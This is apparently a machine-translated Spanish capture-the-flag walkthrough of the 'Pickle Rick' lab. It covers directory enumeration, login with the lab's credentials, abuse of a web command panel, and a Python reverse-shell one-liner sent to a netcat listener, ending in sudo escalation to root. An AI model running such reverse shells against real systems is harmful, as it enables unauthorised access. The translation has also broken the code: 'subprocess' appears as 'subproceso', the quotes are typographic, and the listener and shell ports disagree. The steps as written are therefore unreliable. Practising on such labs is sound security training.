Pickle Rick

Podemos ver un nombre de usuario llamado: R1ckRul3s

Ver siempre /robots.txt

gobuster -u http://”IP de destino” -w “ruta a la lista de palabras” dir

Busque la página de inicio de sesión.

Como hemos encontrado un usuario, probablemente haya una página de inicio de sesión.

Intento manualmente login.php y funciona.

Iniciar sesión.

Inicie sesión utilizando las credenciales que encontramos antes.

Usuario: R1ckRul3s

Contraseña: Wubbalubbadubdub

¡Eso es todo! ¡Estamos dentro!

Y parece que hemos encontrado algo interesante: un panel de comandos que ejecuta código shell directamente a través del sitio.

Puedes probarlo ejecutando “ls”.

Hay un archivo interesante Sup3rS3cretPickl3Ingred.txt y parece que uno de los ingredientes está dentro de él.

Vamos a cazarlo para ver qué encontramos.

Hay algo que filtra algunos comandos ejecutados a través del sitio.

Para evitarlo, podemos intentar abrir un shell inverso.

Abra un shell inverso con el panel de comandos.

Primero necesitamos configurar el lado del servidor que recibirá la conexión, nuestra máquina en ese caso.

Para hacerlo, utilice netcat para escuchar en el puerto 4321.

  • nc -lvnp 4321

En el lado del cliente (Navegador) que se conectará a nuestra máquina, hay muchos scripts para hacer eso mediante el sitio web, puede elegir.

Eche un vistazo al enlace a continuación y vea algunas opciones de script de shell inverso para ejecutar en el panel de comandos:

Utilicé el script de Python

python3 -c 'import socket,subproceso,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“Su IP”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproceso.call([“/bin/sh”,”-i”]);'

Recuerde cambiar “python” a la versión actual “python3”.

¡Lo conseguimos! Conexión recibida.

Busque otro usuario.

Simplemente camina y mira si encuentras algún directorio donde puedan estar los ingredientes.

Encontrarás un directorio de Rick con el segundo ingrediente.

Escalada de privilegios

Es hora de escalar privilegios y ver si podemos encontrar los últimos ingredientes como raíz.

Ver los permisos de sudo para el usuario actual.

sudo -l

Parece que tenemos poder ilimitado usando sudo. jeje

Entonces podemos convertirnos en root con sudo.

Last updated